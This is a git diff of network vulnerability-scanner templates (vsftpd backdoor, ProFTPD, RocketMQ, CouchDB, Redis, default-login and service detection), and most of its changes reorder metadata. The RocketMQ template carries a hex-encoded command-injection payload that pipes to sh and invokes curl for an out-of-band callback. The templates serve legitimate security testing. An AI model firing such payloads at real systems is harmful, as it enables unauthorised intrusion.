   description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability.
   reference:
     - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
+  remediation: This backdoor was removed on July 3rd, 2011.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cwe-id: CWE-78
-  remediation: This backdoor was removed on July 3rd, 2011.
-  tags: network,vsftpd,ftp,backdoor
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,vsftpd,ftp,backdoor
 
 tcp:
   - inputs:
diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml
index 62af220d3f..003c9d7137 100644
--- a/network/cves/2001/CVE-2001-1473.yaml
+++ b/network/cves/2001/CVE-2001-1473.yaml
@@ -5,23 +5,23 @@ info:
   author: iamthefrogy
   severity: high
   description: SSHv1 is deprecated and has known cryptographic issues.
-  remediation: Upgrade to SSH 2.4 or later.
   reference:
     - https://www.kb.cert.org/vuls/id/684820
     - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
     - http://www.kb.cert.org/vuls/id/684820
     - https://exchange.xforce.ibmcloud.com/vulnerabilities/6603
+  remediation: Upgrade to SSH 2.4 or later.
   classification:
     cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
     cvss-score: 7.5
     cve-id: CVE-2001-1473
     cwe-id: CWE-310
-    epss-score: 0.00258
     cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:*
+    epss-score: 0.00258
   metadata:
-    max-request: 2
-    vendor: ssh
+    max-request: 1
     product: ssh
+    vendor: ssh
   tags: cve,cve2001,network,ssh,openssh
 tcp:
   - host:
diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml
index 8a97fba2e3..8befb7bc1e 100644
--- a/network/cves/2015/CVE-2015-3306.yaml
+++ b/network/cves/2015/CVE-2015-3306.yaml
@@ -5,24 +5,24 @@ info:
   author: pdteam
   severity: critical
   description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
-  remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
   reference:
     - https://github.com/t0kx/exploit-CVE-2015-3306
     - https://www.exploit-db.com/exploits/36803/
     - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
     - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
     - https://nvd.nist.gov/vuln/detail/CVE-2015-3306
+  remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
   classification:
     cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
     cvss-score: 10
     cve-id: CVE-2015-3306
     cwe-id: CWE-284
-    epss-score: 0.97267
     cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*
+    epss-score: 0.97267
   metadata:
-    max-request: 2
-    vendor: proftpd
+    max-request: 1
     product: proftpd
+    vendor: proftpd
   tags: cve,cve2015,ftp,rce,network,proftpd,edb
 tcp:
   - host:
diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml
index 4b21aaedbf..0237cae97a 100644
--- a/network/cves/2016/CVE-2016-2004.yaml
+++ b/network/cves/2016/CVE-2016-2004.yaml
@@ -5,25 +5,25 @@ info:
   author: pussycat0x
   severity: critical
   description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
-  remediation: |
-    Upgrade to the most recent version of HP Data Protector.
   reference:
     - https://www.exploit-db.com/exploits/39858
     - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
     - http://www.kb.cert.org/vuls/id/267328
     - https://www.exploit-db.com/exploits/39858/
     - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
+  remediation: |
+    Upgrade to the most recent version of HP Data Protector.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2016-2004
     cwe-id: CWE-306
-    epss-score: 0.06793
     cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
+    epss-score: 0.06793
   metadata:
-    max-request: 2
-    vendor: hp
+    max-request: 1
     product: data_protector
+    vendor: hp
   tags: cve,cve2016,network,iot,hp,rce,edb
 tcp:
   - host:
diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml
index e8ed87a996..388c7a716b 100644
--- a/network/cves/2016/CVE-2016-3510.yaml
+++ b/network/cves/2016/CVE-2016-3510.yaml
@@ -15,9 +15,9 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2016-3510
     cwe-id: CWE-119
-    epss-score: 0.0162000000
+    epss-score: 0.0162
   metadata:
-    max-request: 2
+    max-request: 1
     verified: true
   tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network
 
diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml
index b0515d8c77..d5eaa9bff3 100644
--- a/network/cves/2017/CVE-2017-3881.yaml
+++ b/network/cves/2017/CVE-2017-3881.yaml
@@ -6,24 +6,24 @@ info:
   severity: critical
   description: |
     A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
-  remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
   reference:
     - https://github.com/artkond/cisco-rce
     - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
     - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
     - https://nvd.nist.gov/vuln/detail/CVE-2017-3881
     - http://www.securitytracker.com/id/1038059
+  remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-3881
     cwe-id: CWE-20
-    epss-score: 0.97332
     cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*
+    epss-score: 0.97332
   metadata:
-    max-request: 2
-    vendor: cisco
+    max-request: 1
     product: ios
+    vendor: cisco
   tags: cve,cve2017,cisco,rce,network,kev,msf
 tcp:
   - host:
diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml
index 7ef472e9aa..bc107e8599 100644
--- a/network/cves/2017/CVE-2017-5645.yaml
+++ b/network/cves/2017/CVE-2017-5645.yaml
@@ -6,25 +6,25 @@ info:
   severity: critical
   description: |
     In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
-  remediation: |
-    Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
     - https://nvd.nist.gov/vuln/detail/CVE-2017-5645
     - http://www.openwall.com/lists/oss-security/2019/12/19/2
     - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
     - http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
+  remediation: |
+    Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-5645
     cwe-id: CWE-502
-    epss-score: 0.74805
     cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
+    epss-score: 0.74805
   metadata:
-    max-request: 2
-    vendor: apache
+    max-request: 1
     product: log4j
+    vendor: apache
   tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast,
 variables:
   end: "\r\n"
diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml
index 40da5cb75e..cc64f7feda 100644
--- a/network/cves/2018/CVE-2018-2893.yaml
+++ b/network/cves/2018/CVE-2018-2893.yaml
@@ -16,9 +16,9 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-2893
-    epss-score: 0.973460000
+    epss-score: 0.97346
   metadata:
-    max-request: 2
+    max-request: 1
   tags: cve,cve2018,weblogic,network,deserialization,rce,oracle
 
 tcp:
diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml
index d5951f7dc7..76d5b77b9c 100644
--- a/network/cves/2020/CVE-2020-11981.yaml
+++ b/network/cves/2020/CVE-2020-11981.yaml
@@ -15,9 +15,9 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-11981
     cwe-id: CWE-78
-    epss-score: 0.936930000
+    epss-score: 0.93693
   metadata:
-    max-request: 2
+    max-request: 1
     shodan-query: product:"redis"
     verified: true
   tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive
diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml
index 16130426c3..b6ea57e1b9 100644
--- a/network/cves/2020/CVE-2020-1938.yaml
+++ b/network/cves/2020/CVE-2020-1938.yaml
@@ -5,25 +5,25 @@ info:
   author: milo2012
   severity: critical
   description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
-  remediation: https://access.redhat.com/solutions/4851251
   reference:
     - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
     - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
     - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
     - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
     - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
+  remediation: https://access.redhat.com/solutions/4851251
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-1938
     cwe-id: CWE-269
-    epss-score: 0.97486
     cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
+    epss-score: 0.97486
   metadata:
-    max-request: 4
-    vendor: apache
+    max-request: 1
     product: geode
     shodan-query: title:"Apache Tomcat"
+    vendor: apache
   tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat
 tcp:
   - host:
diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml
index a74985f436..5197b8fa7e 100644
--- a/network/cves/2020/CVE-2020-7247.yaml
+++ b/network/cves/2020/CVE-2020-7247.yaml
@@ -6,24 +6,24 @@ info:
   severity: critical
   description: |
     OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
-  remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
   reference:
     - https://www.openwall.com/lists/oss-security/2020/01/28/3
     - https://nvd.nist.gov/vuln/detail/CVE-2020-7247
     - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
     - http://www.openwall.com/lists/oss-security/2020/01/28/3
     - http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html
+  remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-7247
     cwe-id: CWE-755
-    epss-score: 0.9749
     cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:*
+    epss-score: 0.9749
   metadata:
-    max-request: 2
-    vendor: openbsd
+    max-request: 1
     product: opensmtpd
+    vendor: openbsd
   tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev
 tcp:
   - host:
diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml
index 5b017f6a77..7e4729c059 100644
--- a/network/cves/2021/CVE-2021-44521.yaml
+++ b/network/cves/2021/CVE-2021-44521.yaml
@@ -5,7 +5,6 @@ info:
   author: Y4er
   severity: critical
   description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
-  remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
   reference:
     - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
@@ -13,17 +12,18 @@ info:
     - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
     - http://www.openwall.com/lists/oss-security/2022/02/11/4
     - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
+  remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.1
     cve-id: CVE-2021-44521
     cwe-id: CWE-732,CWE-94
-    epss-score: 0.01212
     cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*
+    epss-score: 0.01212
   metadata:
-    max-request: 2
-    vendor: apache
+    max-request: 1
     product: cassandra
+    vendor: apache
   tags: cve,cve2021,network,rce,apache,cassandra
 tcp:
   - host:
diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml
index ebe5b94ebb..0940db59f8 100644
--- a/network/cves/2022/CVE-2022-0543.yaml
+++ b/network/cves/2022/CVE-2022-0543.yaml
@@ -9,24 +9,24 @@ info:
     vulnerability was introduced by Debian and Ubuntu Redis packages that
     insufficiently sanitized the Lua environment. The maintainers failed to
     disable the package interface, allowing attackers to load arbitrary libraries.
-  remediation: Update to the most recent versions currently available.
   reference:
     - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
     - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
     - https://bugs.debian.org/1005787
     - https://www.debian.org/security/2022/dsa-5081
     - https://lists.debian.org/debian-security-announce/2022/msg00048.html
+  remediation: Update to the most recent versions currently available.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10
     cve-id: CVE-2022-0543
-    epss-score: 0.97184
     cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
+    epss-score: 0.97184
   metadata:
-    max-request: 4
-    vendor: redis
+    max-request: 1
     product: redis
     shodan-query: redis_version
+    vendor: redis
   tags: cve,cve2022,network,redis,unauth,rce,kev
 tcp:
   - host:
diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml
index 583f7ac40b..c4f16b7cce 100644
--- a/network/cves/2022/CVE-2022-24706.yaml
+++ b/network/cves/2022/CVE-2022-24706.yaml
@@ -6,27 +6,27 @@ info:
   severity: critical
   description: |
     In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
-  remediation: |
-    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
   reference:
     - https://www.exploit-db.com/exploits/50914
     - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
     - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
     - http://www.openwall.com/lists/oss-security/2022/04/26/1
     - http://www.openwall.com/lists/oss-security/2022/05/09/1
+  remediation: |
+    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-24706
     cwe-id: CWE-1188
-    epss-score: 0.97407
     cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
+    epss-score: 0.97407
   metadata:
-    verified: "true"
-    max-request: 2
-    vendor: apache
+    max-request: 1
     product: couchdb
     shodan-query: product:"CouchDB"
+    vendor: apache
+    verified: "true"
   tags: cve,cve2022,network,couch,rce,kev
 variables:
   name_msg: "00156e00050007499c4141414141414041414141414141"
diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml
index babe5d2f4c..f4ee827cdc 100644
--- a/network/cves/2023/CVE-2023-33246.yaml
+++ b/network/cves/2023/CVE-2023-33246.yaml
@@ -6,27 +6,27 @@ info:
   severity: critical
   description: |
     For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .
-  remediation: Update the RocketMQ application to version 5.1.1
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-33246
     - https://github.com/I5N0rth/CVE-2023-33246
     - http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html
     - http://www.openwall.com/lists/oss-security/2023/07/12/1
     - https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp
+  remediation: Update the RocketMQ application to version 5.1.1
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2023-33246
     cwe-id: CWE-94
-    epss-score: 0.95581
     cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
+    epss-score: 0.95581
   metadata:
-    verified: true
-    max-request: 2
-    vendor: apache
+    fofa-query: protocol="rocketmq"
+    max-request: 1
     product: rocketmq
     shodan-query: title:"RocketMQ"
-    fofa-query: protocol="rocketmq"
+    vendor: apache
+    verified: true
   tags: cve,cve2023,rocketmq,rce,oast,intrusive,network
 variables:
   part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
diff --git a/network/default-login/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml
index 552eb7830a..4888a5170b 100644
--- a/network/default-login/ftp-anonymous-login.yaml
+++ b/network/default-login/ftp-anonymous-login.yaml
@@ -4,13 +4,13 @@ info:
   name: FTP Anonymous Login
   author: C3l3si4n,pussycat0x
   severity: medium
-  reference:
-    - https://tools.ietf.org/html/rfc2577
   description: |
     Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended.
-  tags: network,ftp,default-login
+  reference:
+    - https://tools.ietf.org/html/rfc2577
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,ftp,default-login
 
 tcp:
   - inputs:
diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml
index 06181d3b73..8e8ae5c1c2 100644
--- a/network/default-login/ftp-weak-credentials.yaml
+++ b/network/default-login/ftp-weak-credentials.yaml
@@ -8,11 +8,11 @@ info:
   reference:
     - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/
   classification:
-    cvss-score: 8.5
     cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
-  tags: network,ftp,default-login,service
+    cvss-score: 8.5
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,ftp,default-login,service
 
 tcp:
 
diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml
index c6ed3c04da..48d4b0e1d8 100644
--- a/network/default-login/ldap-anonymous-login.yaml
+++ b/network/default-login/ldap-anonymous-login.yaml
@@ -13,9 +13,9 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cwe-id: CWE-284
-  tags: network,ldap,default-login,tenable
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,ldap,default-login,tenable
 
 tcp:
   - inputs:
diff --git a/network/detection/activemq-openwire-transport-detect.yaml b/network/detection/activemq-openwire-transport-detect.yaml
index 9e1b3c9164..7502fb0322 100644
--- a/network/detection/activemq-openwire-transport-detect.yaml
+++ b/network/detection/activemq-openwire-transport-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"ActiveMQ OpenWire transport"
     verified: true
-    shodan-query: 'product:"ActiveMQ OpenWire transport"'
   tags: network,activemq,detect
 
 tcp:
diff --git a/network/detection/apache-activemq-detect.yaml b/network/detection/apache-activemq-detect.yaml
index 0d8842fd91..82acb9b8a4 100644
--- a/network/detection/apache-activemq-detect.yaml
+++ b/network/detection/apache-activemq-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"Apache ActiveMQ"
     verified: true
-    shodan-query: 'product:"Apache ActiveMQ"'
   tags: network,activemq,oss,detect
 
 tcp:
diff --git a/network/detection/axigen-mail-server-detect.yaml b/network/detection/axigen-mail-server-detect.yaml
index 5de2d9d507..5c3bc6fa86 100644
--- a/network/detection/axigen-mail-server-detect.yaml
+++ b/network/detection/axigen-mail-server-detect.yaml
@@ -7,10 +7,10 @@ info:
   description: |
     Axigen Mail Server was detected.
   metadata:
-    max-request: 2
-    verified: true
     fofa-query: app="axigen-Mail-Server"
+    max-request: 1
     shodan-query: product:"Axigen"
+    verified: true
   tags: network,axigen,detect
 
 tcp:
diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml
index 72d1eeea38..f6a77f458d 100644
--- a/network/detection/cisco-finger-detect.yaml
+++ b/network/detection/cisco-finger-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: product:"Cisco fingerd"
+    verified: true
   tags: network,finger,detect
 
 tcp:
diff --git a/network/detection/clamav-detect.yaml b/network/detection/clamav-detect.yaml
index d310c515cf..dcd689a06e 100644
--- a/network/detection/clamav-detect.yaml
+++ b/network/detection/clamav-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: port:3310 product:"ClamAV"
     verified: true
-    shodan-query: 'port:3310 product:"ClamAV"'
   tags: network,clamav,detect
 
 tcp:
diff --git a/network/detection/cql-native-transport.yaml b/network/detection/cql-native-transport.yaml
index cf8cab548e..0f5429b67a 100644
--- a/network/detection/cql-native-transport.yaml
+++ b/network/detection/cql-native-transport.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: cassandra
     verified: true
-    shodan-query: "cassandra"
   tags: network,cassandra,cql,detect
 
 tcp:
diff --git a/network/detection/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml
index 59bb244d24..250e4812b5 100644
--- a/network/detection/detect-addpac-voip-gateway.yaml
+++ b/network/detection/detect-addpac-voip-gateway.yaml
@@ -10,11 +10,10 @@ info:
     - http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
-  tags: network,addpac,apos,voip,detect
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,addpac,apos,voip,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml
index 5dbc697df4..924315c66d 100644
--- a/network/detection/detect-jabber-xmpp.yaml
+++ b/network/detection/detect-jabber-xmpp.yaml
@@ -9,11 +9,10 @@ info:
     - https://datatracker.ietf.org/doc/html/rfc6120
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
-  tags: network,jabber,xmpp,messaging,detect
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,jabber,xmpp,messaging,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml
index eecbbf3434..4183336714 100644
--- a/network/detection/dotnet-remoting-service-detect.yaml
+++ b/network/detection/dotnet-remoting-service-detect.yaml
@@ -8,12 +8,11 @@ info:
     Microsoft .NET Remoting httpd was detected.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: product:"MS .NET Remoting httpd"
+    verified: true
   tags: network,detect,microsoft
 
 tcp:
diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml
index 87bfc728d5..2e640b11b8 100644
--- a/network/detection/dropbear-cbc-ciphers.yaml
+++ b/network/detection/dropbear-cbc-ciphers.yaml
@@ -6,14 +6,14 @@ info:
   severity: low
   description: |
     The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext.
-  remediation: |
-    Disable CBC Ciphers.
   reference: |
     https://www.tenable.com/plugins/nessus/70658
+  remediation: |
+    Disable CBC Ciphers.
